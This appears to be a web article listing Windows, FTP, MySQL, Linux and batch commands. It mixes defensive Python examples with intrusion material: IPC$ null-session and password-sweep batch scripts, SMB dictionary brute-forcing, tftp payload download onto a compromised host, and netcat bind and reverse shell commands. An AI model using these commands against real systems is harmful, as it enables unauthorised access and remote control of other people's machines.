
A complete Collection of windows system commands

2025-01-18 update. Source: SLTechnology News&Howtos (shulou), Servers section.

Shulou(Shulou.com)06/02 Report--

Opening a command prompt

Start -> Run -> type cmd (or command on Windows 9x). The banner at the top of the window shows the Windows version; ver prints it again at any time.

A collection of commands that can be typed into Run or a command prompt

1. gpedit.msc - Group Policy editor
2. sndrec32 - Sound Recorder
3. nslookup - DNS query tool; checks whether a DNS server resolves names correctly. Available on Windows NT/2000/XP, not included in Windows 98.
4. explorer - opens Windows Explorer
5. logoff - logs off the current user
6. shutdown - shuts the machine down after a countdown (switches are covered in the Windows 2003 section below)
7. lusrmgr.msc - Local Users and Groups
8. services.msc - Services (local service settings)
9. oobe/msoobe /a - checks whether XP is activated
10. notepad - opens Notepad
11. cleanmgr - Disk Cleanup
12. net start messenger - starts the Messenger service (the service behind net send pop-ups, not an instant messenger)
13. compmgmt.msc - Computer Management
14. net stop messenger - stops the Messenger service
15. conf - starts NetMeeting
16. dvdplay - DVD player
17. charmap - Character Map
18. diskmgmt.msc - Disk Management
19. calc - Calculator
20. dfrg.msc - Disk Defragmenter
21. chkdsk.exe - disk check
22. devmgmt.msc - Device Manager
23. regsvr32 /u name.dll - unregisters a DLL's COM server (it does not unload a DLL that is already in use; the original's "*.dll" is a placeholder for the file name)
24. drwtsn32 - Dr. Watson crash debugger and log viewer
25. rononce -p - shuts down in 15 seconds
26. dxdiag - DirectX Diagnostic Tool
27. regedt32 - the NT-style Registry Editor (on XP it simply launches regedit)
28. msconfig.exe - System Configuration Utility
29. rsop.msc - Resultant Set of Policy
30. mem.exe - displays memory usage
31. regedit.exe - Registry Editor
32. winchat - XP's built-in LAN chat
33. progman - Program Manager
34. winmsd - System Information
35. perfmon.msc - Performance monitor
36. winver - shows the Windows version
37. sfc /scannow - System File Checker / Windows File Protection: scans the protected system files and restores damaged ones
38. taskmgr - Task Manager (2000/XP/2003)
39. wmimgmt.msc - Windows Management Instrumentation (WMI) console
40. wupdmgr - Windows Update
41. wscript - Windows Script Host settings
42. write - WordPad
43. wiaacmgr - Scanner and Camera Wizard
44. mplayer2 - simple Windows Media Player
45. mspaint - Paint
46. mstsc - Remote Desktop Connection
47. magnify - Magnifier
48. mmc - opens an empty Microsoft Management Console
49. mobsync - Synchronization Manager
50. iexpress - builds self-extracting package files; ships with the system and is commonly abused to bundle a payload with a legitimate installer
51. fsmgmt.msc - Shared Folders
52. utilman - Utility Manager (accessibility tools)
53. dcomcnfg - Component Services
54. ddeshare - DDE Shares
55. osk - On-Screen Keyboard
56. odbcad32 - ODBC Data Source Administrator
57. ntbackup - Backup or Restore wizard
58. narrator - Narrator (screen reader)
59. ntmsmgr.msc - Removable Storage
60. ntmsoprq.msc - Removable Storage Operator Requests
61. netstat -an - lists TCP/UDP connections and listening ports in numeric form
62. syncapp - creates a Briefcase
63. sysedit - System Configuration Editor
64. sigverif - File Signature Verification
65. ciadv.msc - Indexing Service
66. shrpubw - Create Shared Folder wizard
67. secpol.msc - Local Security Policy
68. syskey - SAM database encryption; once enabled it cannot be turned off again, and it can add a startup password or floppy key as a second secret in front of the XP logon
69. sndvol32 - Volume Control
70. tourstart - the Windows XP tour shown after installation
71. eventvwr - Event Viewer
72. eudcedit - Private Character Editor
73. packager - Object Packager
74. cliconfg - SQL Server Client Network Utility
75. clipbrd - Clipboard Viewer
76. certmgr.msc - Certificates
77. regsvr32 /u zipfldr.dll - removes compressed (ZIP) folder support
78. cmd.exe - command prompt

Detailed explanation of operation

net use \\ip\ipc$ "" /user:"" - establishes a null-session (empty credentials) IPC$ connection

net use \\ip\ipc$ "password" /user:"username" - establishes an authenticated IPC$ connection

net use h: \\ip\c$ "password" /user:"username" - logs on and maps the remote C: drive to the local drive letter H: in one step

net use h: \\ip\c$ - once an IPC$ session exists, maps the remote C: to local H: without giving credentials again

net use \\ip\ipc$ /del - removes the IPC$ connection

net use h: /del - removes the H: mapping

net user username password /add - creates a local user

net user guest /active:yes - enables the guest account

net user - lists local accounts

net user accountname - shows the properties of an account

net localgroup administrators username /add - adds the user to the local Administrators group, giving it administrator rights

net start - lists running services

net start servicename - starts a service (e.g. net start telnet, net start schedule)

net stop servicename - stops a service

net time \\ip - shows the remote host's time

net time \\ip /set - sets the local clock to the remote host's time; add /yes to suppress the confirmation prompt

net view - lists the computers visible in the workgroup or domain

net view \\ip - lists the shares exported by that host

net config - shows network settings (net config workstation, net config server)

net logoff - listed in the original as "disconnect shares"; it is a Windows for Workgroups command and does not exist in the NT-based net.exe (use net use /del instead)

net pause servicename - pauses a service

net send ip "message" - sends a pop-up message to the host through the Messenger service

net ver - listed in the original as showing the LAN connection types in use; it is also not present in the NT-based net.exe

net share - lists local shares

net share ipc$ - re-creates the ipc$ share

net share ipc$ /del - deletes the ipc$ share

net share c$ /del - deletes the C: administrative share (it is recreated when the Server service restarts unless AutoShareWks/AutoShareServer is set to 0 in the registry)

net user guest 12345 - sets the guest account's password to 12345 (requires administrator rights)

net password - listed in the original as "change the system login password"; not present in the NT-based net.exe; use net user username newpassword instead

netstat -a - lists all connections and listening ports; usually combined as netstat -an

netstat -n - shows addresses and ports numerically instead of resolving names; usually netstat -an

netstat -v - together with -b, shows the components (executables) involved in each connection (XP SP2 and later)

netstat -p protocol - shows connections for one protocol, e.g. netstat -p tcp (the original's "tcq/ip" is a typo)

netstat -s - per-protocol statistics for all protocols in use

nbtstat -A ip - if UDP port 137 on the remote host is reachable, dumps its NetBIOS name table, which includes the name of the logged-on user (the <03> entries)
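Reading netstat -an by eye is error-prone on a busy host, so the following is an added example (not part of the original article) that parses the Windows netstat -an format and flags listening ports outside a baseline, which is how a responder would spot a bind shell like the nc listener on 5354 described later in this page. The sample output and the EXPECTED_PORTS baseline are constructed for the demonstration.

```python
"""Parse Windows `netstat -an` output and flag unexpected listeners.

Added example, not code from the original article. SAMPLE_NETSTAT is a
constructed sample in the Windows XP/2003 output format; EXPECTED_PORTS is an
assumed baseline for the host being checked.
"""
import re
from collections import namedtuple

Conn = namedtuple("Conn", "proto local_addr local_port foreign_addr foreign_port state")

# Constructed sample of what `netstat -an` prints on a Windows host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5354           0.0.0.0:0              LISTENING
  TCP    192.168.0.5:139        0.0.0.0:0              LISTENING
  TCP    192.168.0.5:1043       192.168.0.2:5354       ESTABLISHED
  TCP    192.168.0.5:3389       10.0.0.7:50211         ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    192.168.0.5:137        *:*
"""

# Assumed baseline: ports this host is expected to listen on.
EXPECTED_PORTS = {135, 139, 445, 3389}

_LINE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<faddr>[^:\s]+|\[[^\]]+\]):(?P<fport>\d+|\*)"
    r"(?:\s+(?P<state>\S+))?\s*$"
)


def parse_netstat(text):
    """Turn netstat -an output into Conn records; header lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        fport = None if m["fport"] == "*" else int(m["fport"])
        conns.append(Conn(m["proto"], m["laddr"], int(m["lport"]),
                          m["faddr"], fport, m["state"] or ""))
    return conns


def listening_tcp_ports(conns):
    """Sorted set of TCP ports in LISTENING state."""
    return sorted({c.local_port for c in conns
                   if c.proto == "TCP" and c.state == "LISTENING"})


def established_peers(conns):
    """Sorted (foreign address, foreign port) pairs of ESTABLISHED sessions."""
    return sorted({(c.foreign_addr, c.foreign_port) for c in conns
                   if c.state == "ESTABLISHED"})


def unexpected_listeners(conns, allowed):
    """Listening TCP ports that are not in the allowed baseline."""
    return [p for p in listening_tcp_ports(conns) if p not in allowed]


if __name__ == "__main__":
    conns = parse_netstat(SAMPLE_NETSTAT)
    print("listening:", listening_tcp_ports(conns))
    print("unexpected:", unexpected_listeners(conns, EXPECTED_PORTS))
    print("peers:", established_peers(conns))
```

On the constructed sample the unexpected listener is 5354 and the established peer list shows who is connected to it; on a real host feed the output of netstat -an into parse_netstat and keep the baseline per host role.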

tracert [-w ms] ip-or-hostname - traces the route packets take; -w sets the per-hop timeout in milliseconds

ping ip-or-domain - sends 32-byte echo requests by default. Switches: -l size sets the packet size, -n count sets how many to send, -t pings until stopped

ping -t -l 65550 ip - the "ping of death" described in the original (oversized packets sent continuously). Windows caps -l at 65500 and any patched IP stack reassembles oversized packets safely, so this is of historical interest only

ipconfig - shows the local IP configuration on NT/2000/XP (winipcfg on Windows 95/98); ipconfig /all shows the full configuration

tlist -t - shows processes as a tree (from the Support Tools in Support\Tools on the installation CD, not installed by default)

kill -f processname - forcibly terminates a process (also from the Support Tools)

del /F filename - /F deletes read-only files. /A:R, /A:H, /A:S, /A:A select read-only, hidden, system and archive files respectively; /A:-R, /A:-H, /A:-S, /A:-A select everything except those. For example, del /A:R *.* deletes all read-only files in the current directory, and del /A:-S *.* deletes everything except system files

del /s /q directory or rmdir /s /q directory - /s removes the directory with all of its subdirectories and files; /q skips the confirmation prompt (the two commands have the same effect)

move [/y] path\filename destination-path - moves a file; /y suppresses the prompt when a file with the same name already exists in the destination and overwrites it

fc one.txt two.txt > 3st.txt - compares the two files and writes the differences to 3st.txt (">" and ">>" are redirection operators)

at id - shows a scheduled task that has already been registered

at /delete - removes all scheduled tasks; with /yes it does so without confirmation

at id /delete - removes one registered task

at - lists all scheduled tasks

at \\ip time command - schedules a command to run on the remote host at the given time (the original adds "/r to restart the computer", but at has no /r switch; its switches are /interactive, /every, /next and /delete)

finger username@host - shows which users have logged in recently (when the host runs a finger service)

telnet ip port - logs in to a remote host; the default port is 23

open ip - connects to a host from inside the telnet prompt

telnet - typing telnet on its own enters the local telnet prompt

copy path\file1 path\file2 /y - copies file 1 to the given directory as file 2; /y suppresses the prompt to overwrite an existing file

copy c:\srv.exe \\ip\admin$ - copies the local c:\srv.exe to the remote host's admin$ share (its Windows directory)

copy 1st.jpg /b + 2st.txt /a 3st.jpg - appends the contents of 2st.txt to 1st.jpg and writes the result as 3st.jpg, hiding the text behind a valid image. /b means binary file, /a means ASCII file. The original recommends leaving three blank lines at the top of 2st.txt

copy \\ip\admin$\srv.exe c:\ or copy \\ip\admin$\*.* c:\ - copies srv.exe (or all files) from the remote host's admin$ share to the local C:
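The copy /b + /a trick above works because image viewers stop at the JPEG end-of-image marker and ignore whatever follows it. The following is an added example (not from the original article) that models that concatenation and shows the check a defender runs on suspect images: look for bytes after the last FF D9 marker. The JPEG bytes are a constructed minimal stub, and the Ctrl-Z handling is an assumed simplification of cmd.exe's ASCII-mode behaviour rather than an exact emulation.

```python
"""Model `copy image /b + text /a out` and detect data appended after EOI.

Added example, not code from the original article. STUB_JPEG is a constructed
minimal JPEG (SOI, one APP0 segment, EOI), not a real picture. The Ctrl-Z
handling in copy_b_plus_a is an assumed simplification of cmd.exe's ASCII
mode (read the text up to the first Ctrl-Z, append one Ctrl-Z at the end).
"""
SOI, EOI, CTRL_Z = b"\xff\xd8", b"\xff\xd9", b"\x1a"

# Constructed stub: SOI + APP0 (length 16: "JFIF\0", version 1.1, no density,
# no thumbnail) + EOI. Real files have many more segments before EOI.
STUB_JPEG = (SOI
             + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + EOI)


def copy_b_plus_a(image: bytes, text: bytes) -> bytes:
    """Approximate `copy image /b + text /a out`: the image is copied verbatim,
    the text is read in ASCII mode (stops at the first Ctrl-Z) and, because the
    destination inherits /a, a trailing Ctrl-Z is written (assumption)."""
    payload = text.split(CTRL_Z, 1)[0]
    return image + payload + CTRL_Z


def trailing_data(blob: bytes) -> bytes:
    """Return whatever follows the last EOI marker (b'' for a clean file).

    Caveat: if the appended payload itself contains FF D9, only the part after
    its last occurrence is returned, so compare the file size against the
    structure as well when triaging."""
    if not blob.startswith(SOI):
        raise ValueError("not a JPEG (missing SOI marker)")
    idx = blob.rfind(EOI)
    if idx < 0:
        raise ValueError("no EOI marker found")
    return blob[idx + len(EOI):]


def is_suspicious(blob: bytes) -> bool:
    """True when anything other than Ctrl-Z / line-ending padding follows EOI."""
    return len(trailing_data(blob).strip(CTRL_Z + b"\r\n")) > 0


if __name__ == "__main__":
    hidden = copy_b_plus_a(STUB_JPEG, b"\r\n\r\n\r\nsecret message\r\n")
    print("clean file suspicious:", is_suspicious(STUB_JPEG))
    print("hidden payload:", trailing_data(hidden))
```

The stub still starts with a valid SOI/APP0/EOI sequence after the append, which is exactly why the hidden copy opens as a normal picture; the only evidence is the length and the bytes past EOI.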

xcopy source-file-or-tree destination-directory - copies files and directory trees; /Y overwrites same-named files without prompting

xcopy ... /E - also copies subdirectories, including empty ones, to the destination

tftp -i ip get server.exe c:\server.exe - run on the compromised host you are using as a springboard: downloads server.exe from the TFTP server at ip to c:\server.exe. -i transfers in binary mode, which is required for executables; without it the transfer uses ASCII (text) mode

tftp -i ip put c:\server.exe - uploads the local c:\server.exe to the TFTP server at ip

ftp ip port - uploads files to, or works on files on, an FTP server; the default port is 21. bin switches to binary transfer (for executables); the default is ASCII transfer (for text files)

route print - shows the IP routing table: Network Address, Netmask, Gateway Address, Interface and Metric

arp - views and edits the ARP cache. ARP is the Address Resolution Protocol, which maps an IP address to a physical MAC address; arp -a shows all cached entries

start /max or /min program-or-command - opens a new window and runs the program maximised (or minimised)

mem - shows memory usage (not CPU usage, as the original states)

attrib filename-or-directory - shows the attributes of a file or directory

attrib filename -A -R -S -H or +A +R +S +H - removes (-) or adds (+) the archive, read-only, system and hidden attributes

dir /Q - shows which user owns each file and directory; dir /T:C shows creation time, dir /T:A last access time, dir /T:W last write time

date /t, time /t - with /t, date and time only display the current date or time instead of prompting for a new one

set name=value - sets an environment variable

set - displays all current environment variables

set p - displays all environment variables whose names begin with p (or any other prefix given)

pause - pauses a batch program and shows "Press any key to continue"

if - conditional processing in a batch program (see the if commands and variables section below)

goto label - jumps to the labelled line of the batch program (the label must be on its own line and start with a colon, e.g. ":start")

call path\batchfile - calls another batch program from a batch program (see call /? for details)

for - runs a command for each file in a set of files (see the for commands and variables section below)

echo on or off - turns command echoing on or off; echo on its own shows the current setting

echo text - prints text on the screen

echo text >> pass.txt - appends text to the file pass.txt

findstr "hello" aa.txt - searches aa.txt for the string hello

find "string" filename - searches a file for a string (the original says "find a file"; find searches file contents, it does not locate files)

title name - changes the title of the CMD window

color value - sets the foreground and background colours of the console: 0 black, 1 blue, 2 green, 3 aqua, 4 red, 5 purple, 6 yellow, 7 white, 8 grey, 9 light blue, A light green, B light aqua, C light red, D light purple, E light yellow, F bright white

prompt text - changes the command prompt displayed by cmd.exe (e.g. replaces "C:\>", "D:\>" with "EntSky")

ver - displays the Windows version in the console

winver - pops up a window with version information (build, service pack, memory size)

format drive: /FS:type - formats the drive with the given file system: FAT, FAT32 or NTFS, e.g. format d: /FS:NTFS

md directory - creates a directory

replace source-file destination-directory - replaces a file in the destination directory with the source file

ren oldname newname - renames a file

tree - displays the directory structure as a tree; /F also lists the files in each folder

type filename - displays the contents of a text file

more filename - displays a file one screen at a time

doskey command=text - defines a macro that replaces a command. doskey edits the command line, recalls previous commands and creates macros. For example, doskey dir=entsky "locks" dir by redefining it to a nonsense name (doskey dir=dir would not work); doskey dir= removes the macro and unlocks it

taskmgr - launches Task Manager

chkdsk /F d: - checks drive D: and prints a status report; /F also fixes errors found on the disk

tlntadmn - telnet service administration on Windows 2000: run tlntadmn, choose 3, then 8 to change the telnet service port from the default 23 to another port

exit - exits cmd.exe or the current script; exit /B exits the current batch script without closing cmd.exe

path directory - sets the search path for executables

cmd - starts a new Windows 2000 command interpreter. /E:OFF and /E:ON disable and enable command extensions; see cmd /? for the full list

regedit /s file.reg - imports a registry file; /S means silent mode with no prompts

regedit /e file.reg [key] - exports the registry (or one key) to a file

cacls filename switches - displays or modifies the access control list (ACL) of a file on NTFS. Switches: /D user denies the user access; /P user:perm replaces the user's rights; /G user:perm grants the user rights; perm is N none, R read, W write, C change (write), F full control. Example: cacls d:\test.txt /D pub denies the user pub access to d:\test.txt. Without /E, cacls replaces the whole ACL rather than editing it

cacls filename - shows the ACL of the file

rem text - adds a comment to a batch file

netsh - views or changes the local network configuration

IIS service commands

iisreset /reboot - restarts the Windows 2000 computer (a system-restart message is shown)

iisreset /start or /stop - starts (stops) all Internet services

iisreset /restart - stops and restarts all Internet services

iisreset /status - displays the status of all Internet services

iisreset /enable or /disable - enables (disables) restarting of Internet services on the local system

iisreset /rebootonerror - reboots the computer if an error occurs while starting, stopping or restarting the Internet services

iisreset /noforce - does not forcibly terminate the Internet services if they cannot be stopped

iisreset /timeout:seconds - how long to wait for the Internet services to stop; if /rebootonerror is also given the computer reboots when the time elapses. Defaults are 20 seconds for restart, 60 seconds for stop and 0 seconds for reboot

FTP commands (more details later)

The command-line format for ftp is:

ftp -v -d -i -n -g [hostname]

-v shows all responses from the remote server

-d uses debug mode

-i turns off interactive prompting during multi-file transfers

-n disables automatic login, i.e. does not use .netrc files

-g disables file name globbing (wildcards)

help [command] or ? [command] - shows the description of a command

bye or quit - ends the FTP session and exits

pwd - prints the current directory on the remote host

put or send localfile [remotefile] - uploads a local file to the remote host

get or recv remotefile [localfile] - downloads a file from the remote host

mget remote-files - downloads a batch of files

mput local-files - uploads a batch of files

dir or ls [remote-directory] [local-file] - lists the current remote directory; if a local file is given, writes the listing to it

ascii - transfers files in ASCII mode (the default)

bin or image - transfers files in binary mode

bell - rings a bell after each file transfer completes

cdup - goes up to the parent directory

close - ends the session with the remote server (the counterpart of open)

open host [port] - connects to the given FTP server, optionally on a specific port

delete - deletes a file on the remote host

mdelete remote-files - deletes a batch of files

mkdir directory - creates a directory on the remote host

rename from to - renames a file on the remote host

rmdir directory - deletes a directory on the remote host

status - shows the current FTP status

system - shows the remote host's system type

user username [password] [account] - logs in to the remote host again as a different user

open host [port] - establishes a new connection

prompt - toggles interactive prompting

macdef - defines a macro

lcd - changes the working directory on the local host; with no argument, changes to the current user's home directory

chmod - changes file permissions on the remote host

case - when on, file names copied with mget are converted to lowercase on the local machine

cd remote-dir - changes to a directory on the remote host

cdup - changes to the parent of the current remote directory

! - runs an interactive shell on the local machine; exit returns to ftp. A command can also be given directly, e.g. !ls

Five:

MySQL commands

mysql -h host -u username -ppassword - connects to MySQL; on a fresh installation the superuser root has no password.

(example: mysql -h 210.110.110.110 -u root -p123456

Note: -p and the password must not be separated by a space, otherwise -p prompts for the password interactively; the other options take a space)

exit - leaves the mysql client

mysqladmin -u username -poldpassword password newpassword - changes the password

grant select on database.* to username@host identified by "password"; - adds a new user (note: unlike the commands above, the following are typed inside the mysql client, so each ends with a semicolon as the statement terminator)

show databases; - lists the databases. A fresh installation has only two, mysql and test. The mysql database is important: it holds MySQL's own system tables, and it is the one used to change passwords and add users.

use mysql; - selects the mysql database

show tables; - lists the tables in the current database

describe tablename; - shows the structure of a table

create database name; - creates a database

use name; - selects a database

create table name (field definitions); - creates a table

drop database name; - deletes a database

drop table name; - deletes a table

delete from tablename; - deletes all rows from a table

select * from tablename; - shows the rows in a table

mysqldump --opt school > school.bbb - backs up a database (run at a command prompt in the mysql\bin directory). This dumps the database school to the text file school.bbb; the file name is arbitrary, and opening it shows the SQL needed to recreate the database.

New commands on Windows 2003 (practical part):

shutdown /switches - shuts down or restarts the local or a remote host.

Switches: /s shuts down, /r restarts, /t seconds sets the delay, /a aborts a pending shutdown, /m \\ip targets a remote host.

Example: shutdown /r /t 0 restarts the local host immediately (no delay)

taskkill /switches process-name-or-pid - terminates one or more processes.

Switches: /pid n terminates the process with that PID (get PIDs from tasklist), /im name terminates by image name, /f forces termination, /t also terminates the child processes it started.

tasklist - lists the processes, services and service processes running on the local or a remote host with their process identifiers (PIDs).

Switches: /m lists the DLLs loaded by each process, /svc shows the services hosted by each process; with no switches only the process list is shown.

Basic commands on Linux systems (note: case sensitive)

uname - shows system/version information (the counterpart of ver on Windows 2000)

dir - lists the files in the current directory; ls -al also shows hidden files (the counterpart of dir on Windows 2000)

pwd - shows the current directory

cd .. - goes to the parent directory (note the space between cd and ..); cd / goes to the root directory

cat filename - shows the contents of a file

cat > abc.txt - writes what you type into abc.txt

more filename - displays a text file one page at a time

cp - copies files

mv - moves files

rm filename - deletes a file; rm -r directory deletes a directory and its subdirectories (the original's "rm -a" is not a valid option)

mkdir directory - creates a directory

rmdir - deletes an empty subdirectory

chmod - sets the access permissions of a file or directory

grep - searches for strings in files

diff - compares files

find - searches for files

date - shows the current date and time

who - lists the users logged in to the same machine, with login time and location

w - shows details of the current users and what they are running

whoami - shows your own account name

groups - shows the groups a user belongs to

passwd - changes a password

history - shows the commands previously entered

ps - shows process status

kill - terminates a process

gcc - compiles C source files

su - switches to another user (root by default)

telnet ip - telnet to the remote host (as on Windows 2000); a bash$ prompt means the connection succeeded

ftp - connects to an FTP server (as on Windows 2000)

Batch commands and variables

One: basic format of the for command and its variables

for /switch %variable in (set) do command [command_parameters]

%variable: a single-letter replaceable parameter such as %i. On the command line it is written %i; inside a batch file it must be doubled, %%i. Environment variables set with set are referenced as %name%. Variables are case sensitive (%i is not %I).

A batch file can use ten argument variables, %0 to %9: %0 is the batch file name and %1 is the first argument given when the batch is run; %2 to %9 are the second to ninth arguments. For example, in net use \\%1\ipc$ %3 /user:%2 the IP is %1, the user name %2 and the password %3.

(set): a file or group of files (wildcards allowed), e.g. (d:\user.txt), or with /L a numeric triple such as (1,1,254), where the first 1 is the start value, the second 1 the step and 254 the end value, i.e. 1 to 254; (254,-1,1) counts down from 254 to 1.

command: the command to run for each item, e.g. net use; several commands are separated with &

command_parameters: the switches or arguments of that command

in (set) means take each value from (set) in turn; do command means run the command for it

Switches: /L iterates over a numeric range (set is a start,step,end triple); /F reads values from a file line by line until the end (set is a file, e.g. (d:\pass.txt)).

Usage example:

@echo off
echo usage: test.bat first-three-octets-of-the-subnet > test.txt
for /L %%G in (1,1,254) do net use \\%1.%%G\ipc$ "" /user:administrator 2>nul | find "completed successfully" >nul && echo %1.%%G >> test.txt & net use \\%1.%%G\ipc$ /del >nul 2>&1

Save as test.bat. Description: for each of the 254 addresses of the given class C network, try to establish an IPC$ connection as administrator with an empty password; each IP where this succeeds is written to test.txt, and the connection is then dropped again. (The original wrote the IP to the file before the net use ran, so every address was logged regardless of success; the && above logs only on a match. The string "completed successfully" is the English net use message; localised systems print a different one.)

/L means iterate over a numeric range (here 1 to 254); %1 is the first three octets of the IP typed after test.bat; %%G is the for variable holding the last octet; %1.%%G is the complete IP address; & and && separate the commands; | feeds the net use output into find, which checks for the "completed successfully" message; (1,1,254) gives the start, step and end values.

@echo off
echo usage: ok.bat ip
for /F %%I in (d:\user.dic) do smb.exe %1 %%I d:\pass.dic 200

Save as ok.bat (the original says ok.exe; a batch file must have the .bat extension). Description: given an IP, try every user name in d:\user.dic with the password dictionary d:\pass.dic using the third-party tool smb.exe, until the file is exhausted. %%I is the user name and %1 the IP address typed after ok.bat.

Seven:

Two: basic format of the if command and its variables

if [not] errorlevel number command - runs the command when the exit code of the last program is greater than or equal to number.

Because of that "greater than or equal" rule, if errorlevel 0 command is always true. Test for success (exit code 0) with if not errorlevel 1 command, and for failure with if errorlevel 1 command.

By convention an exit code of 0 means found / executed successfully (true) and 1 means not found / failed (false).

if [not] string1==string2 command - runs the command when the two strings match (string 1 equals string 2).

Example: if "%2"=="4" goto start means: if the second argument is 4, jump to the label start (note: quote both sides when comparing an argument, so that an empty argument does not produce a syntax error).

if [not] exist filename command - runs the command when the file exists.

Example: if not exist nc.exe goto end means: if nc.exe is not found, jump to the label :end.

if [not] errorlevel number command else command, if [not] string1==string2 command else command, or if [not] exist filename command else command - the else command runs when the condition is not true. Note: else must be on the same line as if to be recognised.

When the first command is del this needs care, because del would take "else ..." as further file names. Wrap the command in parentheses, which is equivalent to putting it on its own line:

if exist test.txt (del test.txt) else echo test.txt missing

External commands

Note: these are not part of the system; the tools have to be downloaded separately.

Swiss Army knife: nc.exe

Parameters:

-h shows the help

-d detaches from the console (runs in the background)

-e prog runs the program as soon as a connection is made [dangerous]

-i secs delay interval between lines sent or ports scanned

-l listens for an inbound connection

-L listens "harder": keeps listening after a connection closes, until Ctrl+C (Windows build)

-n numeric-only IP addresses, no DNS lookups

-o file writes a hex dump of the traffic to the file

-p port sets the local port number

-r randomises local and remote ports

-t answers Telnet negotiation

-u UDP mode

-v verbose output; -vv is more verbose

-w secs timeout for connects and final net reads

-z zero-I/O mode, used for scanning

Basic usage:

nc -nvv 192.168.0.1 80 - connects to port 80 of 192.168.0.1

nc -l -p 80 - opens TCP port 80 on this machine and listens

nc -nvv -w2 -z 192.168.0.1 80-1024 - scans ports 80-1024 of 192.168.0.1 with a 2-second timeout

nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe - bind shell: on the remote host, binds cmd.exe to TCP port 5354

nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354 - reverse shell: on the remote host, connects cmd.exe back to port 5354 of 192.168.0.2

Advanced usage:

nc -L -p 80 - honeypot 1: listens on port 80 and keeps listening until Ctrl+C

nc -L -p 80 > c:\log.txt - honeypot 2: as above, and writes everything received to c:\log.txt

nc -L -p 80 < c:\honeyport.txt - honeypot 3-1: as above, and sends the contents of c:\honeyport.txt to whoever connects; this also works as a way to transfer a file

type c:\honeyport.txt | nc -L -p 80 - honeypot 3-2: same effect as 3-1, using a pipe instead of input redirection

Reverse connection to get past the remote host's firewall: on your machine run nc -l -p localport; on the remote host run nc -e cmd.exe yourIP localport (Windows 2000) or nc -e /bin/sh yourIP localport (Linux/Unix). Note: the original writes "-p localport" on the remote side; in nc, -p sets the local source port, while the destination port is the positional argument after the IP.

File transfer: on your machine run nc -d -l -p localport < path\file-to-send; on the remote host run nc -vv yourIP localport > path\file-to-write, which sends the file to the remote host
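The port sweep nc -nvv -w2 -z host 80-1024 is a plain TCP connect scan: complete the handshake, send nothing, close, and treat a timeout as filtered. The following is an added example (not from the original article or from netcat) that implements the same -z/-w behaviour in Python so the states can be seen explicitly; the self-test at the bottom opens a throwaway listener on 127.0.0.1, so it runs offline, and the port it lands on is whatever the OS assigns rather than a value from the article.

```python
"""TCP connect scan with a per-port timeout, the equivalent of
`nc -nvv -w2 -z host 80-1024`.

Added example, not code from the original article or from netcat. The
throwaway listener below is only there so the demonstration runs offline
against 127.0.0.1.
"""
import socket
import threading


def parse_port_spec(spec: str):
    """'80-1024' -> [80..1024]; '22' -> [22]; '22,80-81' -> [22, 80, 81]."""
    ports = []
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        lo = int(lo)
        hi = int(hi) if hi else lo
        if not (0 < lo <= hi <= 65535):
            raise ValueError(f"bad port range: {part}")
        ports.extend(range(lo, hi + 1))
    return ports


def probe(host: str, port: int, timeout: float = 2.0) -> str:
    """Like nc -z -w: finish the handshake, send nothing, close.

    Returns 'open' (SYN/ACK), 'closed' (RST, connection refused) or
    'filtered' (timeout or unreachable, as when a firewall drops the SYN)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, OSError):
            return "filtered"


def scan(host: str, spec: str, timeout: float = 2.0) -> dict:
    """Map port -> state for every port in the spec (sequential, like nc)."""
    return {p: probe(host, p, timeout) for p in parse_port_spec(spec)}


def open_ports(host: str, spec: str, timeout: float = 2.0):
    """Only the ports that answered the handshake."""
    return [p for p, state in scan(host, spec, timeout).items() if state == "open"]


def _accept_loop(srv):
    # Accept and immediately close, as a bind shell or honeypot listener would
    # see it from the scanner's side; stop once the socket is closed.
    while True:
        try:
            conn, _ = srv.accept()
            conn.close()
        except OSError:
            return


def throwaway_listener():
    """Bind a listener on an OS-chosen loopback port (sample target)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    threading.Thread(target=_accept_loop, args=(srv,), daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = throwaway_listener()
    port = srv.getsockname()[1]
    print(scan("127.0.0.1", f"{port - 1}-{port + 1}", timeout=1.0))
    srv.close()
```

A connect scan is noisy: every open port sees a full connection in its logs, which is exactly what the honeypot variants above (nc -L -p 80 > c:\log.txt) are built to record.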

Remarks:

| - pipe: feeds the output of one command into the next

< or > - redirection: < reads a command's input from a file; > writes its output to a file, overwriting it; >> appends to the file.

For example, run @dir c:\winnt >> d:\log.txt twice and then @dir c:\winnt > d:\log.txt twice and compare: with >> both listings are kept, while with > only one remains, because the second run overwrites the first.

Eight:

Scanning tool: xscan.exe

Basic format

Xscan-host [-] [other options] sweep all host information for the anchor "start IP to end IP" section

Xscan-file [other options] sweep all host information in the Host IP list File name

Test item

-active to check whether the host is alive

-os detects remote operating system types (through NETBIOS and SNMP protocols)

-port detects the port status of common services

-ftp detects FTP weak password

-pub detects anonymous user write permissions for FTP services

-pop3 detects POP3-Server weak password

-smtp detects SMTP-Server vulnerabilities

-sql detects SQL-Server weak password

-smb detects NT-Server weak password

-iis detects IIS encoding / decoding vulnerabilities

-cgi detects CGI vulnerabilities

-nasl loads Nessus (NASL) scripts

-all detects all the above items

Other options

-i <adapter number>  sets the network adapter; the number can be obtained with the -l option

-l displays all network adapters

-v shows detailed scan progress

-p skips hosts that are not responding

-o Skip hosts that do not detect open ports

-t <threads>,<hosts>  maximum number of concurrent threads and concurrent hosts; the defaults are 100 and 10

-log <file name>  name of the scan report file (TXT or HTML, chosen by the suffix)

Usage example

